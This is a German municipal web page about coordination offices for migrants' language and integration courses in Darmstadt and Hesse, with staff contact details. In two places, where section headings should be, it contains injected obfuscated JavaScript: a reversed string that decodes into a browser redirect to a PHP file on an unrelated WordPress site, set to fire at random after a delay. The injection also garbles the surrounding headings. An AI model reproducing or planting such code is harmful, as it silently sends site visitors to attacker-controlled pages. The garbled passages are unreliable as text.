Koordination und Absprache

Startseite » Unsere Themen » Sprache » Koordination und Absprache

Koordination und Absprache

Zu den Themen Sprache und Spracherwerb gibt es verschiedene Stellen, die eine koordinierende Funktion haben und für unterschiedliche Fragen zuständig sind.

Regionalstelle des BAMF

Das Bundesamt für Migration und Flüchtlinge (BAMF) mit Sitz in Nürnberg hat in ganz Deutschland Regionalstellen. Von dort aus wird mittels der Regionalkoordinatoren die Integrationsarbeit des Bundes regionenbezogen umgesetzt.
Hier einige der vielen Aufgaben der Regionalkoordinatoren:
Sie sind für alle Aufgaben im Zusammenhang mit der Durchführung der Integrationskurse zuständig und sorgen dafür, dass ein entsprechendes Angebot an Integrationskursen vorhanden ist.
Sie sind Ansprechpartner für Ausländerbehörden, Integrationskursträger, Migrationsberatungsstellen, Migrantenorganisationen, Arbeitsverwaltung und weitere mit Integrationsmaßnahmen befassten Stellen, aber auch für potentielle Teilnehmer.
Sie sorgen durch Besuche der Integrationskurse, der Migrationsberatungsstellen für erwachsene Zuwanderer, der Projekte, die das BAMF fördert, und der niedrigschwelligen Frauenkurse dafür, dass die vom Bundesamt für Migration und Flüchtlinge entwickelten Qualitätsstandards eingehalten werden.
Die Vernetzung wird durch das BAMF-Netzwerktreffen sichergestellt.

Bundesamt für Migration und Flüchtlinge
Silvia Abel
Regionalkoordinatorin
Referat 513
Flughafen Frankfurt Gebäude 587
60549 Frankfurt/M
069 / 69813 175
069 / 69813 299
  silvia.abel@bamf.bund.de
  integration-fra@bamf.bund.de

”BAMF

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andserhebung” font_container=”tag:h3|text_align:left” use_theme_fonts=”yes”]

Das BAMF hat 2016 in einem Pilotprojekt im Saarland und dann anschließend an 5 weiteren Standorten sogenannte Test-und Meldestellen eingerichtet. Ziel ist es, den Zugang zu Sprachkursen für anerkannte Asylbewerber und Flüchtlingen aus Ländern mit Bleibeperspektive sehr zeitnah zu ermöglichen. Die Zulassung zu einem Integrationskurs wird im Ankunftszentrum erstellt. In der Teststelle findet eine Einstufung des Sprachniveaus statt. Es erfolgt eine Zuweisung zu einem Kursträger, der entsprechend einen freien Kursplatz anbietet.
Seit Anfang des Jahres erfolgt hessenweit die Zuweisung von Flüchtlingen mit Bleibeperspektive bzw. schon erfolgter Anerkennung über die Gießener Test-und Meldestelle in Integrationskurse in der Kommune.
Perspektivisch sollen Test- und Meldestellen bundesweit in den Kommunen installiert werden, um zentral einzustufen und gezielt Teilnehmer in Kurse zuzuweisen.

Test-und Meldestellen
Wolfgang Boller
wolfgang.boller@bamf.bund.de

”Bildungskoordinatorin

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}anderte” font_container=”tag:h3|text_align:left” use_theme_fonts=”yes”]

Die Zuwanderungsprozesse der Wissenschaftsstadt Darmstadt sind vielfältig. Von Familien mit Kindern, unbegleiteten Minderjährigen, allein reisenden Erwachsenen mit anerkanntem Flüchtlingsstatus bis zu ausländischen Studierenden und Fachkräften prägt Migration die Stadtgesellschaft.
Um neuzugewanderten Menschen der letzten 2-5 Jahre, aber auch Menschen mit Migrations- oder Fluchthintergrund, die schon länger in Darmstadt leben eine gleichberechtigte Teilhabe am gesellschaftlichen Leben zu ermöglichen, ist Bildung eine Grundvoraussetzung.
Bildung erstreckt sich dabei auf alle Phasen des Lebens im Sinne von lebenslangem Lernen von der frühkindlichen, der schulischen und außerschulischen, über die berufliche Aus- und Weiterbildung bis hin zum Bereich der Erwachsenenbildung, Grundbildung und nonformale Angebote für junge und ältere Menschen mit Zuwanderungsgeschichte. Hier ein bedarfsgerechtes Bildungs- und Beratungsangebote bereit zu stellen, ist eine Aufgabe der Stadtverwaltung.
Seit Ende 2016 kooperiert die Bildungskoordination für Neuzugewanderte im Schulamt bei dieser Aufgaben mit den für die Themen Migration, Asyl, Menschen mit Fluchterfahrung, Soziales und Bildung relevanten Ämtern, freien Trägern und der Zivilgesellschaft Darmstadts zusammen und ist jederzeit ansprechbar. So können Synergien innerhalb der Wissenschaftsstadt Darmstadt genutzt werden und ein weiter Blick auf den Bildungsbereich wird möglich.

Die Aufgabenbereiche der Bildungskoordination umfassen:

 

Kommunale Koordinierung der Bildungsangebote für Neuzugewanderte
Wissenschaftsstadt Darmstadt
Der Magistrat
Schulamt
Katja Abzieher
Frankfurter Straße 71
64293 Darmstadt
06151 / 133369
06151 / 132918
katja.abzieher@darmstadt.de